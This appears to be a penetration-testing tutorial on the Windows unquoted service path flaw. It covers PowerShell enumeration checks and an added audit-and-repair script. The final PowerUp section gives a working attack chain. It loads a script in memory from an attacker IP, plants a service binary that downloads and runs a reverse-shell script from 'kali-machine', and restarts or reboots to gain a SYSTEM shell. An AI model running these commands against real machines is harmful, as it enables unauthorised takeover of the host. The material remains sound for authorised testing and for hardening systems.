Unquoted Service Path
Unquoted Service Paths – Windows Privilege Escalation
In simple terms, when a service is created whose executable path contains spaces and is not enclosed in quotes, this leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges (only if the vulnerable service runs at the SYSTEM privilege level, which it does most of the time). The root cause is how Windows resolves an unquoted path with spaces: it tries each space-delimited prefix with .exe appended (for C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe that means C:\Program.exe, then C:\Program Files.exe, then C:\Program Files (x86)\IObit\IObit.exe) before reaching the intended binary, so a writable directory anywhere along that chain lets a file planted there run as the service account.
Manual Checks
Check service without quotes:
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
Check File or Directory Permissions:
Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
Check Service Permissions:
Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *
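The three manual checks above can be combined into one audit. The script below is an added example and is not part of the original page or of PowerUp: it enumerates services whose PathName contains spaces and is unquoted, derives the intermediate executables Windows would try (the same search order described above), and reports whether the current user can write to the directory each candidate would live in (checked by creating and deleting a probe file, so it reflects effective permissions rather than a guess from the ACL). Repair-UnquotedServicePath is the remediation half and assumes an elevated shell; it rewrites the ImagePath with the binary portion quoted via the Win32_Service Change method. The regex that splits the binary from its arguments at the first .exe is an assumption for this example.

```powershell
# Added example (not from the original page): audit and remediate unquoted service paths.
# Run the audit as the user whose exposure you want to assess; run the repair elevated.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    # Assumption: the binary ends at the first ".exe"; anything after it is arguments.
    $exePart = $PathName
    if ($PathName -match '^(.*?\.exe)') { $exePart = $Matches[1] }
    $parts = $exePart -split ' '
    $candidates = @()
    # Every prefix except the full path is a location Windows will probe first.
    for ($i = 0; $i -lt $parts.Count - 1; $i++) {
        $candidates += (($parts[0..$i] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    try {
        # Probe file name is constructed; it is removed immediately after the write succeeds.
        $probe = Join-Path $Directory ('usp-probe-' + [guid]::NewGuid().ToString() + '.tmp')
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServiceExposure {
    $services = Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notlike '"*' -and      # not already quoted
            $_.PathName -like '* *' -and        # contains a space
            $_.PathName -notlike 'C:\Windows*'  # same exclusion as the manual check
        }
    foreach ($svc in $services) {
        foreach ($candidate in Get-UnquotedPathCandidates -PathName $svc.PathName) {
            $dir = Split-Path -Path $candidate -Parent
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Candidate = $candidate
                Writable  = Test-DirectoryWritable -Directory $dir
            }
        }
    }
}

function Repair-UnquotedServicePath {
    # Requires an elevated shell. Wraps the binary path in quotes and keeps any arguments.
    param([Parameter(Mandatory)][string]$Name)
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name = '$Name'"
    if (-not $svc) { throw "Service '$Name' not found" }
    if ($svc.PathName -match '^(.*?\.exe)(.*)$') {
        $fixed  = '"' + $Matches[1] + '"' + $Matches[2]
        $result = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $fixed }
        if ($result.ReturnValue -ne 0) { throw "Change failed with return value $($result.ReturnValue)" }
        return $fixed
    }
    throw "Could not locate an .exe in '$($svc.PathName)'"
}

# Usage: list every exposed candidate, sorted so writable ones surface first.
Get-UnquotedServiceExposure | Sort-Object Writable -Descending | Format-Table -AutoSize
```

Rows with Writable = True on a service whose RunsAs is LocalSystem and whose StartMode is Auto are the ones that matter; fixing them is a one-liner, for example Repair-UnquotedServicePath -Name IObitUnSvr, followed by re-running the audit to confirm the PathName now starts with a quote. Removing write access for standard users from the intermediate directory is the complementary fix when the path cannot be changed.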
Unquoted Service Path with PowerUp
First, import PowerUp.ps1 to memory.
iex ((New-Object Net.WebClient).DownloadString('http://192.168.45.243/OSEP/powershell/PowerUp.ps1'))
Then, check for privilege escalation vectors using this command:
Invoke-AllChecks | fl
Alternatively, for checking unquoted service paths specifically, use this command:
Get-UnquotedService | fl
Example output:
For detailed information about the vulnerable service, use this command:
Get-ServiceDetail -Name IObitUnSvr | Select-object *
Now, for abusing the service, you can use Write-ServiceBinary command:
Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "powershell iex ((New-Object Net.WebClient).DownloadString('http://kali-machine/revshell.ps1'))" | fl
The above command drops a binary at that path containing the reverse shell command, so Windows executes it in place of the intended service binary the next time the service starts.
If you have ability to restart the service, you can run:
Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'
If you do not have the privilege to restart the service (CanRestart = False), you can instead reboot the machine, since the service is set to autostart.
shutdown -r -t 0
Now, your netcat listener will receive a session as the NT AUTHORITY\SYSTEM user.